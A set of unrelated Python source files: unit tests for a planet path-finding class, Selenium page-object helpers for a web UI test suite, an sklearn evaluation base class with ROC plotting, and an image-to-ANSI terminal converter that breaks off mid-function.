        self.assertEqual(self.havok.get_next_node((15, 39)),
                         [((15, 39), Direction.EAST)])

    def test_get_direction(self):
        """The unexplored exit of (13, 37) points SOUTH."""
        self.assertEqual(self.havok.get_direction((13, 37)), Direction.SOUTH)
class ExploringNodes(unittest.TestCase):
def setUp(self):
self.nugget = Planet()
self.nugget.add_path(((0, 0), Direction.NORTH),
((0, 1), Direction.SOUTH), 1)
# 0,1 all known
self.nugget.add_path(((0, 1), Direction.NORTH),
((1, 0), Direction.SOUTH), 1)
self.nugget.add_path(((0, 1), Direction.EAST),
((1, 1), Direction.SOUTH), 1)
self.nugget.add_path(((0, 1), Direction.WEST),
((1, 1), Direction.SOUTH), 1)
def test_next_node(self):
self.assertFalse(self.nugget.go_direction((0, 0)))
self.assertNotEqual(
self.nugget.get_next_node((0, 0)), [((0, 0), Direction.NORTH)])
if __name__ == "__main__":
unittest.main() | src/planettest.py |
import unittest
from planet import *
class ExampleTestPlanet(unittest.TestCase):
def setUp(self):
# set your data structure
self.havok = Planet()
self.havok.add_path(((15, 37), Direction.NORTH),
((15, 39), Direction.SOUTH), 1)
# loop
self.havok.add_path(((15, 39), Direction.NORTH),
((15, 39), Direction.WEST), 1)
self.havok.add_path(((15, 39), Direction.EAST),
((16, 39), Direction.WEST), 1)
self.havok.add_path(((15, 37), Direction.WEST),
((14, 39), Direction.SOUTH), 1)
self.havok.add_path(((14, 39), Direction.WEST),
((13, 38), Direction.NORTH), 1)
self.havok.add_path(((13, 38), Direction.SOUTH),
((13, 37), Direction.NORTH), 1)
# blocked paths
self.havok.add_path(((15, 37), Direction.SOUTH),
((15, 37), Direction.SOUTH), -1)
self.havok.add_path(((16, 39), Direction.NORTH),
((16, 39), Direction.NORTH), -1)
self.havok.add_path(((17, 38), Direction.SOUTH),
((17, 37), Direction.NORTH), 1)
def test_empty_planet(self):
self.assertIsNotNone(self.havok.get_paths())
self.assertNotEqual(self.havok.get_paths(), {})
def test_target_not_reachable(self):
self.assertIsNone(self.havok.shortest_path((13, 37), (20, 38)))
self.assertIsNone(self.havok.shortest_path((13, 37), (17, 38)))
class shortestPathTestPlanet(unittest.TestCase):
def setUp(self):
# set your data structure
self.havok = Planet()
self.havok.add_path(((15, 37), Direction.NORTH),
((15, 39), Direction.SOUTH), 1)
self.havok.add_path(((15, 37), Direction.EAST),
((17, 37), Direction.WEST), 1)
# loop
self.havok.add_path(((15, 39), Direction.NORTH),
((15, 39), Direction.WEST), 1)
self.havok.add_path(((15, 39), Direction.EAST),
((16, 39), Direction.WEST), 1)
self.havok.add_path(((15, 37), Direction.WEST),
((14, 39), Direction.SOUTH), 1)
self.havok.add_path(((14, 39), Direction.WEST),
((13, 38), Direction.NORTH), 1)
self.havok.add_path(((13, 38), Direction.SOUTH),
((13, 37), Direction.NORTH), 1)
self.havok.add_path(((17, 38), Direction.SOUTH),
((17, 37), Direction.NORTH), 1)
# changed this weight to make dijkstra predictable
self.havok.add_path(((17, 38), Direction.EAST),
((17, 37), Direction.EAST), 2)
self.havok.add_path(((16, 39), Direction.EAST),
((17, 38), Direction.NORTH), 1)
self.havok.add_path(((16, 39), Direction.SOUTH),
((17, 38), Direction.WEST), 1)
# blocked paths
self.havok.add_path(((15, 37), Direction.SOUTH),
((15, 37), Direction.SOUTH), -1)
self.havok.add_path(((16, 39), Direction.NORTH),
((16, 39), Direction.NORTH), -1)
def test_shortest_path(self):
print("HI")
print(self.havok.shortest_path((17, 38), (17, 38)))
self.assertEqual(
self.havok.shortest_path((13, 37), (17, 38)),
[((13, 37), Direction.NORTH), ((13, 38), Direction.NORTH),
((14, 39), Direction.SOUTH), ((15, 37), Direction.EAST),
((17, 37), Direction.NORTH)])
class ExploringTestPlanet(unittest.TestCase):
def setUp(self):
self.havok = Planet()
self.havok.add_path(((15, 37), Direction.NORTH),
((15, 39), Direction.SOUTH), 1)
self.havok.add_path(((15, 37), Direction.EAST),
((17, 37), Direction.WEST), 1)
self.havok.add_path(((15, 39), Direction.NORTH),
((15, 39), Direction.WEST), 1)
self.havok.add_path(((15, 39), Direction.EAST),
((16, 39), Direction.WEST), 1)
self.havok.add_path(((16, 39), Direction.EAST),
((17, 38), Direction.NORTH), 1)
self.havok.add_path(((16, 39), Direction.SOUTH),
((17, 38), Direction.WEST), 1)
self.havok.add_path(((17, 38), Direction.SOUTH),
((17, 37), Direction.NORTH), 1)
self.havok.add_path(((17, 38), Direction.EAST),
((17, 37), Direction.EAST), 1)
self.havok.add_path(((15, 37), Direction.WEST),
((14, 39), Direction.SOUTH), 1)
self.havok.add_path(((14, 39), Direction.WEST),
((13, 38), Direction.NORTH), 1)
self.havok.add_path(((13, 38), Direction.SOUTH),
((13, 37), Direction.NORTH), 1)
self.havok.add_unknown_paths({(13, 37): [(Direction.SOUTH, -2)]})
self.havok.add_unknown_paths({(16, 39): [(Direction.NORTH, -2)]})
def test_go_direction(self):
self.assertTrue(self.havok.go_direction((13, 37)))
self.assertFalse(self.havok.go_direction((15, 37)))
def test_get_next_node(self):
self.assertEqual(
self.havok.get_next_node((15, 37)), [((15, 37), Direction.NORTH),
((15, 39), Direction.EAST)])
self.assertEqual(
self.havok.get_next_node((15, 39)), [((15, 39), Direction.EAST)])
def test_get_direction(self):
self.assertEqual(self.havok.get_direction((13, 37)), Direction.SOUTH)
class ExploringNodes(unittest.TestCase):
def setUp(self):
self.nugget = Planet()
self.nugget.add_path(((0, 0), Direction.NORTH),
((0, 1), Direction.SOUTH), 1)
# 0,1 all known
self.nugget.add_path(((0, 1), Direction.NORTH),
((1, 0), Direction.SOUTH), 1)
self.nugget.add_path(((0, 1), Direction.EAST),
((1, 1), Direction.SOUTH), 1)
self.nugget.add_path(((0, 1), Direction.WEST),
((1, 1), Direction.SOUTH), 1)
def test_next_node(self):
self.assertFalse(self.nugget.go_direction((0, 0)))
self.assertNotEqual(
self.nugget.get_next_node((0, 0)), [((0, 0), Direction.NORTH)])
if __name__ == "__main__":
unittest.main() | 0.628293 | 0.457985 |
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import StaleElementReferenceException
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.support.wait import WebDriverWait
import browser
import time
class PageObject:
XPATH_RADIO = '//div[@class="custom-tumbler" ' \
'and input[@type="radio" and @name="{}" and @value="{}"]]'
XPATH_CHECKBOX = \
'//div[@class="custom-tumbler" ' \
'and input[@type="checkbox" and @name="{}"]]'
def __init__(self, parent=None):
self.parent = parent or browser.driver
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
@staticmethod
def wait_until_moving(element, timeout=10):
class Move:
def __init__(self, elem):
self.element = elem
self.location = elem.location
def __call__(self, *args, **kwargs):
loc = element.location
res = self.location['x'] == loc['x'] \
and self.location['y'] == loc['y']
self.location = loc
return res
wait = WebDriverWait(browser.driver, timeout)
wait.until(Move(element))
@staticmethod
def wait_until_exists(element, timeout=10):
wait = WebDriverWait(browser.driver, timeout)
try:
wait.until(lambda driver: not element.is_displayed())
except StaleElementReferenceException:
pass
@staticmethod
def wait_element(page_object, attribute, timeout=10):
class El:
def __init__(self, page_object, attribute):
self.page_object = page_object
self.attribute = attribute
def __call__(self, *args, **kwargs):
try:
getattr(self.page_object, attribute)
return True
except NoSuchElementException:
return False
wait = WebDriverWait(browser.driver, timeout)
wait.until(El(page_object, attribute))
@staticmethod
def long_wait_element(page_object, attribute, timeout=40):
class El:
def __init__(self, page_object, attribute):
self.page_object = page_object
self.attribute = attribute
def __call__(self, *args, **kwargs):
try:
getattr(self.page_object, attribute)
return True
except (NoSuchElementException,
StaleElementReferenceException):
return False
wait = WebDriverWait(browser.driver, timeout)
wait.until(El(page_object, attribute))
@staticmethod
def click_element(page_object, *args):
# get the list of attributes passed to the method
attributes = [attribute for attribute in args]
attempts = 0
while attempts < 5:
try:
"""1, 3, 4 are the number of passed to the method attributes
1 means that only class name and one property
were passed to the method
3 means that class name, two properties and index
of the element were passed to the method
4 means that class name, three properties and index
of the element were passed to the method
"""
if len(attributes) == 1:
getattr(page_object, attributes[0]).click()
elif len(attributes) == 3:
getattr(getattr(page_object, attributes[0])
[attributes[2]], attributes[1]).click()
elif len(attributes) == 4:
getattr(getattr(getattr(page_object,
attributes[0])[attributes[3]],
attributes[1]), attributes[2]).click()
break
except (StaleElementReferenceException, NoSuchElementException,
WebDriverException):
time.sleep(0.5)
attempts += 1
@staticmethod
def find_element(page_object, *args):
attributes = [attribute for attribute in args]
attempts = 0
while attempts < 5:
try:
if len(attributes) == 1:
return getattr(page_object, attributes[0])
elif len(attributes) == 3:
return getattr(getattr(page_object,
attributes[0])[attributes[2]],
attributes[1])
elif len(attributes) == 4:
return getattr(getattr(getattr(page_object,
attributes[0])[attributes[3]],
attributes[1]), attributes[2])
break
except (StaleElementReferenceException, NoSuchElementException,
WebDriverException):
time.sleep(0.5)
attempts += 1
@staticmethod
def get_text(page_object, *args):
attributes = [attribute for attribute in args]
attempts = 0
while attempts < 5:
try:
if len(attributes) == 1:
return getattr(page_object, attributes[0]).text
elif len(attributes) == 3:
return getattr(getattr(page_object,
attributes[0])[attributes[2]],
attributes[1]).text
elif len(attributes) == 4:
return getattr(getattr(getattr(page_object,
attributes[0])[attributes[3]],
attributes[1]), attributes[2]).text
break
except (StaleElementReferenceException, NoSuchElementException):
time.sleep(0.5)
attempts += 1
@staticmethod
def get_lower_text(page_object, *args):
attributes = [attribute for attribute in args]
attempts = 0
while attempts < 5:
try:
if len(attributes) == 1:
return getattr(page_object, attributes[0]).text.lower()
elif len(attributes) == 3:
return getattr(getattr(page_object,
attributes[0])[attributes[2]],
attributes[1]).text.lower()
elif len(attributes) == 4:
return getattr(getattr(getattr(page_object,
attributes[0])[attributes[3]],
attributes[1]), attributes[2]).text.lower()
break
except (StaleElementReferenceException, NoSuchElementException):
time.sleep(0.5)
attempts += 1
class Popup(PageObject):
def __init__(self):
element = browser.driver.find_element_by_css_selector('div.modal')
PageObject.__init__(self, element)
time.sleep(0.5)
# PageObject.wait_until_moving(self.parent)
def wait_until_exists(self):
try:
PageObject.wait_until_exists(
browser.driver.
find_element_by_css_selector('div.modal-backdrop'))
except NoSuchElementException:
pass
# Check that element is displayed
@staticmethod
def wait_until_element_will_be_displayed(self, element):
try:
wait = WebDriverWait(browser.driver, 3)
wait.until(element.is_displayed())
except NoSuchElementException:
pass
@property
def close_cross(self):
return self.parent.find_element_by_css_selector('.close')
@property
def header(self):
return self.parent.find_element_by_css_selector('.modal-header > h3')
class ConfirmPopup(Popup):
TEXT = 'Settings were modified but not saved'
@property
def stay_on_page(self):
return self.parent.find_element_by_css_selector('.btn-return')
@property
def leave_page(self):
return self.parent.\
find_element_by_css_selector('.proceed-btn') | fuelweb_ui_test/pageobjects/base.py | from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import StaleElementReferenceException
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.support.wait import WebDriverWait
import browser
import time
class PageObject:
XPATH_RADIO = '//div[@class="custom-tumbler" ' \
'and input[@type="radio" and @name="{}" and @value="{}"]]'
XPATH_CHECKBOX = \
'//div[@class="custom-tumbler" ' \
'and input[@type="checkbox" and @name="{}"]]'
def __init__(self, parent=None):
self.parent = parent or browser.driver
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
@staticmethod
def wait_until_moving(element, timeout=10):
class Move:
def __init__(self, elem):
self.element = elem
self.location = elem.location
def __call__(self, *args, **kwargs):
loc = element.location
res = self.location['x'] == loc['x'] \
and self.location['y'] == loc['y']
self.location = loc
return res
wait = WebDriverWait(browser.driver, timeout)
wait.until(Move(element))
@staticmethod
def wait_until_exists(element, timeout=10):
wait = WebDriverWait(browser.driver, timeout)
try:
wait.until(lambda driver: not element.is_displayed())
except StaleElementReferenceException:
pass
@staticmethod
def wait_element(page_object, attribute, timeout=10):
class El:
def __init__(self, page_object, attribute):
self.page_object = page_object
self.attribute = attribute
def __call__(self, *args, **kwargs):
try:
getattr(self.page_object, attribute)
return True
except NoSuchElementException:
return False
wait = WebDriverWait(browser.driver, timeout)
wait.until(El(page_object, attribute))
@staticmethod
def long_wait_element(page_object, attribute, timeout=40):
class El:
def __init__(self, page_object, attribute):
self.page_object = page_object
self.attribute = attribute
def __call__(self, *args, **kwargs):
try:
getattr(self.page_object, attribute)
return True
except (NoSuchElementException,
StaleElementReferenceException):
return False
wait = WebDriverWait(browser.driver, timeout)
wait.until(El(page_object, attribute))
@staticmethod
def click_element(page_object, *args):
# get the list of attributes passed to the method
attributes = [attribute for attribute in args]
attempts = 0
while attempts < 5:
try:
"""1, 3, 4 are the number of passed to the method attributes
1 means that only class name and one property
were passed to the method
3 means that class name, two properties and index
of the element were passed to the method
4 means that class name, three properties and index
of the element were passed to the method
"""
if len(attributes) == 1:
getattr(page_object, attributes[0]).click()
elif len(attributes) == 3:
getattr(getattr(page_object, attributes[0])
[attributes[2]], attributes[1]).click()
elif len(attributes) == 4:
getattr(getattr(getattr(page_object,
attributes[0])[attributes[3]],
attributes[1]), attributes[2]).click()
break
except (StaleElementReferenceException, NoSuchElementException,
WebDriverException):
time.sleep(0.5)
attempts += 1
@staticmethod
def find_element(page_object, *args):
attributes = [attribute for attribute in args]
attempts = 0
while attempts < 5:
try:
if len(attributes) == 1:
return getattr(page_object, attributes[0])
elif len(attributes) == 3:
return getattr(getattr(page_object,
attributes[0])[attributes[2]],
attributes[1])
elif len(attributes) == 4:
return getattr(getattr(getattr(page_object,
attributes[0])[attributes[3]],
attributes[1]), attributes[2])
break
except (StaleElementReferenceException, NoSuchElementException,
WebDriverException):
time.sleep(0.5)
attempts += 1
@staticmethod
def get_text(page_object, *args):
attributes = [attribute for attribute in args]
attempts = 0
while attempts < 5:
try:
if len(attributes) == 1:
return getattr(page_object, attributes[0]).text
elif len(attributes) == 3:
return getattr(getattr(page_object,
attributes[0])[attributes[2]],
attributes[1]).text
elif len(attributes) == 4:
return getattr(getattr(getattr(page_object,
attributes[0])[attributes[3]],
attributes[1]), attributes[2]).text
break
except (StaleElementReferenceException, NoSuchElementException):
time.sleep(0.5)
attempts += 1
@staticmethod
def get_lower_text(page_object, *args):
attributes = [attribute for attribute in args]
attempts = 0
while attempts < 5:
try:
if len(attributes) == 1:
return getattr(page_object, attributes[0]).text.lower()
elif len(attributes) == 3:
return getattr(getattr(page_object,
attributes[0])[attributes[2]],
attributes[1]).text.lower()
elif len(attributes) == 4:
return getattr(getattr(getattr(page_object,
attributes[0])[attributes[3]],
attributes[1]), attributes[2]).text.lower()
break
except (StaleElementReferenceException, NoSuchElementException):
time.sleep(0.5)
attempts += 1
class Popup(PageObject):
def __init__(self):
element = browser.driver.find_element_by_css_selector('div.modal')
PageObject.__init__(self, element)
time.sleep(0.5)
# PageObject.wait_until_moving(self.parent)
def wait_until_exists(self):
try:
PageObject.wait_until_exists(
browser.driver.
find_element_by_css_selector('div.modal-backdrop'))
except NoSuchElementException:
pass
# Check that element is displayed
@staticmethod
def wait_until_element_will_be_displayed(self, element):
try:
wait = WebDriverWait(browser.driver, 3)
wait.until(element.is_displayed())
except NoSuchElementException:
pass
@property
def close_cross(self):
return self.parent.find_element_by_css_selector('.close')
@property
def header(self):
return self.parent.find_element_by_css_selector('.modal-header > h3')
class ConfirmPopup(Popup):
TEXT = 'Settings were modified but not saved'
@property
def stay_on_page(self):
return self.parent.find_element_by_css_selector('.btn-return')
@property
def leave_page(self):
return self.parent.\
find_element_by_css_selector('.proceed-btn') | 0.534127 | 0.113506 |
import pickle
from itertools import cycle
from time import time
from tqdm.auto import tqdm
import shutil
from pathlib import Path
# Pandas, Numpy
import pandas as pd
import numpy as np
from numpy import interp
from matplotlib import pyplot as plt
pd.set_option("display.max_columns", None)
# Model evaluation
from sklearn.metrics import plot_confusion_matrix, roc_auc_score, auc, \
precision_recall_fscore_support, classification_report, roc_curve, plot_roc_curve
# Sklearn pipeline
from sklearn.base import TransformerMixin, BaseEstimator
from sklearn.pipeline import FeatureUnion
from sklearn.compose import ColumnTransformer
from sklearn import set_config
from sklearn.pipeline import Pipeline
set_config(display = 'diagram')
class PipelineLogger(object):
def __init__(self):
self.logs = {}
def log_start(self, key, message=''):
self.logs[key] = {}
self.logs[key]['start_time'] = time()
print(f':::{self.__class__.__name__} ~ {key}::: START ::: {message}')
return None
def log_finish(self, key, message=''):
self.logs[key]['finish_time'] = time()
self.logs[key]['duration'] = self.logs[key]['finish_time'] - self.logs[key]['start_time']
print(f':::{self.__class__.__name__} ~ {key}::: FINISH ::: Take {self.duration:.6f}(s)')
print(message)
class ExperimentBaseClassifier(BaseEstimator):
def evaluate(self, X_test, y_test):
print('Evaluating model')
print(classification_report(y_true=y_test, y_pred=self.predict(X_test)))
metrics = self.auc_report(X_test, y_test)
metrics['precision'], metrics['recall'], metrics['f1_score'], metrics['support'] = precision_recall_fscore_support(y_test, self.predict(X_test))
return metrics
def auc_report(self, X, y_true):
classes = self.classes_
y_pred_classes = self.predict_proba(X)
n_classes = len(classes)
lw = 2
for i in range(len(classes)):
print(f"""{classes[i]}: {roc_auc_score(y_true=(y_true==classes[i]).astype(int), y_score=y_pred_classes[:,i])}""")
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
fpr[i], tpr[i], _ = roc_curve(y_true=(y_true==classes[i]).astype(int), y_score=y_pred_classes[:,i])
roc_auc[i] = auc(fpr[i], tpr[i])
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(len(classes))]))
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(len(classes)):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure()
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])
for i, color in zip(range(n_classes), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.2f})'
''.format(classes[i], roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Some extension of Receiver operating characteristic to multi-class')
plt.legend(loc="lower right")
plt.show()
metrics = {
'macro_auc': roc_auc["macro"]
}
for i in range(n_classes):
metrics[f'auc_{classes[i]}'] = roc_auc[i]
return metrics
class BaseEnrichment(TransformerMixin, BaseEstimator):
def __init__(self, source_col, enrichment_df):
super().__init__()
self.source_col = source_col
self.enrichment_df = enrichment_df.set_index(self.source_col)
def fit(self, X, y=None):
return self
def transform(self, X):
X_ = X.join(self.enrichment_df, on=self.source_col, how='left')[self.enrichment_df.columns]
return X_ | pskit/base.py | import pickle
from itertools import cycle
from time import time
from tqdm.auto import tqdm
import shutil
from pathlib import Path
# Pandas, Numpy
import pandas as pd
import numpy as np
from numpy import interp
from matplotlib import pyplot as plt
pd.set_option("display.max_columns", None)
# Model evaluation
from sklearn.metrics import plot_confusion_matrix, roc_auc_score, auc, \
precision_recall_fscore_support, classification_report, roc_curve, plot_roc_curve
# Sklearn pipeline
from sklearn.base import TransformerMixin, BaseEstimator
from sklearn.pipeline import FeatureUnion
from sklearn.compose import ColumnTransformer
from sklearn import set_config
from sklearn.pipeline import Pipeline
set_config(display = 'diagram')
class PipelineLogger(object):
def __init__(self):
self.logs = {}
def log_start(self, key, message=''):
self.logs[key] = {}
self.logs[key]['start_time'] = time()
print(f':::{self.__class__.__name__} ~ {key}::: START ::: {message}')
return None
def log_finish(self, key, message=''):
self.logs[key]['finish_time'] = time()
self.logs[key]['duration'] = self.logs[key]['finish_time'] - self.logs[key]['start_time']
print(f':::{self.__class__.__name__} ~ {key}::: FINISH ::: Take {self.duration:.6f}(s)')
print(message)
class ExperimentBaseClassifier(BaseEstimator):
def evaluate(self, X_test, y_test):
print('Evaluating model')
print(classification_report(y_true=y_test, y_pred=self.predict(X_test)))
metrics = self.auc_report(X_test, y_test)
metrics['precision'], metrics['recall'], metrics['f1_score'], metrics['support'] = precision_recall_fscore_support(y_test, self.predict(X_test))
return metrics
def auc_report(self, X, y_true):
classes = self.classes_
y_pred_classes = self.predict_proba(X)
n_classes = len(classes)
lw = 2
for i in range(len(classes)):
print(f"""{classes[i]}: {roc_auc_score(y_true=(y_true==classes[i]).astype(int), y_score=y_pred_classes[:,i])}""")
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
fpr[i], tpr[i], _ = roc_curve(y_true=(y_true==classes[i]).astype(int), y_score=y_pred_classes[:,i])
roc_auc[i] = auc(fpr[i], tpr[i])
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(len(classes))]))
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(len(classes)):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure()
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])
for i, color in zip(range(n_classes), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.2f})'
''.format(classes[i], roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Some extension of Receiver operating characteristic to multi-class')
plt.legend(loc="lower right")
plt.show()
metrics = {
'macro_auc': roc_auc["macro"]
}
for i in range(n_classes):
metrics[f'auc_{classes[i]}'] = roc_auc[i]
return metrics
class BaseEnrichment(TransformerMixin, BaseEstimator):
def __init__(self, source_col, enrichment_df):
super().__init__()
self.source_col = source_col
self.enrichment_df = enrichment_df.set_index(self.source_col)
def fit(self, X, y=None):
return self
def transform(self, X):
X_ = X.join(self.enrichment_df, on=self.source_col, how='left')[self.enrichment_df.columns]
return X_ | 0.817866 | 0.225897 |
import os
import sys
import fcntl
import struct
import termios
import argparse
import itertools
from PIL import Image
from PIL.ImagePalette import ImagePalette
PALETTES = {
'tango': (
(0x00, 0x00, 0x00), (0xcc, 0x00, 0x00),
(0x4e, 0x9a, 0x06), (0xc4, 0xa0, 0x00),
(0x34, 0x65, 0xa4), (0x75, 0x50, 0x7b),
(0x06, 0x98, 0x9a), (0xd3, 0xd7, 0xcf),
(0x55, 0x57, 0x53), (0xef, 0x29, 0x29),
(0x8a, 0xe2, 0x34), (0xfc, 0xe9, 0x4f),
(0x72, 0x9f, 0xcf), (0xad, 0x7f, 0xa8),
(0x34, 0xe2, 0xe2), (0xee, 0xee, 0xec)
),
'linux': (
(0x00, 0x00, 0x00), (0xaa, 0x00, 0x00),
(0x00, 0xaa, 0x00), (0xaa, 0x55, 0x00),
(0x00, 0x00, 0xaa), (0xaa, 0x00, 0xaa),
(0x00, 0xaa, 0xaa), (0xaa, 0xaa, 0xaa),
(0x55, 0x55, 0x55), (0xff, 0x55, 0x55),
(0x55, 0xff, 0x55), (0xff, 0xff, 0x55),
(0x55, 0x55, 0xff), (0xff, 0x55, 0xff),
(0x55, 0xff, 0xff), (0xff, 0xff, 0xff)
),
'xterm': (
(0x00, 0x00, 0x00), (0xcd, 0x00, 0x00),
(0x00, 0xcd, 0x00), (0xcd, 0xcd, 0x00),
(0x00, 0x00, 0xee), (0xcd, 0x00, 0xcd),
(0x00, 0xcd, 0xcd), (0xe5, 0xe5, 0xe5),
(0x7f, 0x7f, 0x7f), (0xff, 0x00, 0x00),
(0x00, 0xff, 0x00), (0xff, 0xff, 0x00),
(0x5c, 0x5c, 0xff), (0xff, 0x00, 0xff),
(0x00, 0xff, 0xff), (0xff, 0xff, 0xff)
),
'rxvt': (
(0x00, 0x00, 0x00), (0xcd, 0x00, 0x00),
(0x00, 0xcd, 0x00), (0xcd, 0xcd, 0x00),
(0x00, 0x00, 0xcd), (0xcd, 0x00, 0xcd),
(0x00, 0xcd, 0xcd), (0xfa, 0xeb, 0xd7),
(0x40, 0x40, 0x40), (0xff, 0x00, 0x00),
(0x00, 0xff, 0x00), (0xff, 0xff, 0x00),
(0x00, 0x00, 0xff), (0xff, 0x00, 0xff),
(0x00, 0xff, 0xff), (0xff, 0xff, 0xff)
),
'solarized': (
(0x07, 0x36, 0x42), (0xdc, 0x32, 0x2f),
(0x85, 0x99, 0x00), (0xb5, 0x89, 0x00),
(0x26, 0x8b, 0xd2), (0xd3, 0x36, 0x82),
(0x2a, 0xa1, 0x98), (0xee, 0xe8, 0xd5),
(0x00, 0x2b, 0x36), (0xcb, 0x4b, 0x16),
(0x58, 0x6e, 0x75), (0x65, 0x7b, 0x83),
(0x83, 0x94, 0x96), (0x6c, 0x71, 0xc4),
(0x93, 0xa1, 0xa1), (0xfd, 0xf6, 0xe3)
)
}
ANSI_256 = tuple(tuple(int(x[y*2:(y+1)*2], 16) for y in range(3)) for x in (
'000000,00005f,000087,0000af,0000d7,0000ff,005f00,005f5f,'
'005f87,005faf,005fd7,005fff,008700,00875f,008787,0087af,'
'0087d7,0087ff,00af00,00af5f,00af87,00afaf,00afd7,00afff,'
'00d700,00d75f,00d787,00d7af,00d7d7,00d7ff,00ff00,00ff5f,'
'00ff87,00ffaf,00ffd7,00ffff,5f0000,5f005f,5f0087,5f00af,'
'5f00d7,5f00ff,5f5f00,5f5f5f,5f5f87,5f5faf,5f5fd7,5f5fff,'
'5f8700,5f875f,5f8787,5f87af,5f87d7,5f87ff,5faf00,5faf5f,'
'5faf87,5fafaf,5fafd7,5fafff,5fd700,5fd75f,5fd787,5fd7af,'
'5fd7d7,5fd7ff,5fff00,5fff5f,5fff87,5fffaf,5fffd7,5fffff,'
'870000,87005f,870087,8700af,8700d7,8700ff,875f00,875f5f,'
'875f87,875faf,875fd7,875fff,878700,87875f,878787,8787af,'
'8787d7,8787ff,87af00,87af5f,87af87,87afaf,87afd7,87afff,'
'87d700,87d75f,87d787,87d7af,87d7d7,87d7ff,87ff00,87ff5f,'
'87ff87,87ffaf,87ffd7,87ffff,af0000,af005f,af0087,af00af,'
'af00d7,af00ff,af5f00,af5f5f,af5f87,af5faf,af5fd7,af5fff,'
'af8700,af875f,af8787,af87af,af87d7,af87ff,afaf00,afaf5f,'
'afaf87,afafaf,afafd7,afafff,afd700,afd75f,afd787,afd7af,'
'afd7d7,afd7ff,afff00,afff5f,afff87,afffaf,afffd7,afffff,'
'd70000,d7005f,d70087,d700af,d700d7,d700ff,d75f00,d75f5f,'
'd75f87,d75faf,d75fd7,d75fff,d78700,d7875f,d78787,d787af,'
'd787d7,d787ff,d7af00,d7af5f,d7af87,d7afaf,d7afd7,d7afff,'
'd7d700,d7d75f,d7d787,d7d7af,d7d7d7,d7d7ff,d7ff00,d7ff5f,'
'd7ff87,d7ffaf,d7ffd7,d7ffff,ff0000,ff005f,ff0087,ff00af,'
'ff00d7,ff00ff,ff5f00,ff5f5f,ff5f87,ff5faf,ff5fd7,ff5fff,'
'ff8700,ff875f,ff8787,ff87af,ff87d7,ff87ff,ffaf00,ffaf5f,'
'ffaf87,ffafaf,ffafd7,ffafff,ffd700,ffd75f,ffd787,ffd7af,'
'ffd7d7,ffd7ff,ffff00,ffff5f,ffff87,ffffaf,ffffd7,ffffff,'
'080808,121212,1c1c1c,262626,303030,3a3a3a,444444,4e4e4e,'
'585858,626262,6c6c6c,767676,808080,8a8a8a,949494,9e9e9e,'
'a8a8a8,b2b2b2,bcbcbc,c6c6c6,d0d0d0,dadada,e4e4e4,eeeeee'
).split(','))
def _getdimensions():
call = fcntl.ioctl(1, termios.TIOCGWINSZ, "\000"*8)
height, width = struct.unpack("hhhh", call)[:2]
return width, height
def get_terminal_dimensions():
# Copied from PyPy.
try:
width, height = _getdimensions()
except (KeyboardInterrupt, SystemExit, MemoryError, GeneratorExit):
raise
except:
# FALLBACK
width = int(os.environ.get('COLUMNS', 80))
height = int(os.environ.get('LINES', 80))
else:
# XXX the windows getdimensions may be bogus, let's sanify a bit
if width < 40:
width = 80
height = 24
return width, height
class Image2ANSI:
DEFAULT_PALETTE = 'tango'
def __init__(self, mode, palette=None):
if mode == '4b':
self.colors = 16
self.pal = Image.new('P', (4, 4))
self.pal.putpalette(
tuple(itertools.chain.from_iterable(
PALETTES[palette or DEFAULT_PALETTE])) * 16
)
self.pal.load()
self.func_fg = lambda x: '\x1b[%d%dm' % (9 if x//8 else 3, x%8)
self.func_bg = lambda x: '\x1b[%d%dm' % (10 if x//8 else 4, x%8)
elif mode == '8b':
self.colors = 256
self.pal = Image.new('P', (16, 16))
self.pal.putpalette(
tuple(itertools.chain.from_iterable(
PALETTES[palette or DEFAULT_PALETTE] + ANSI_256))
)
self.pal.load()
self.func_fg = lambda x: '\x1b[38;5;%dm' % x
self.func_bg = lambda x: '\x1b[48;5;%dm' % x
else:
# 24bit
self.colors = None
self.pal = None
self.func_fg = lambda x: '\x1b[38;2;%d;%d;%dm' % x
self.func_bg = lambda x: '\x1b[48;2;%d;%d;%dm' % x
def convert(self, img, width, height):
newimg = img.convert('RGB').resize((width, height), Image.LANCZOS)
if self.pal:
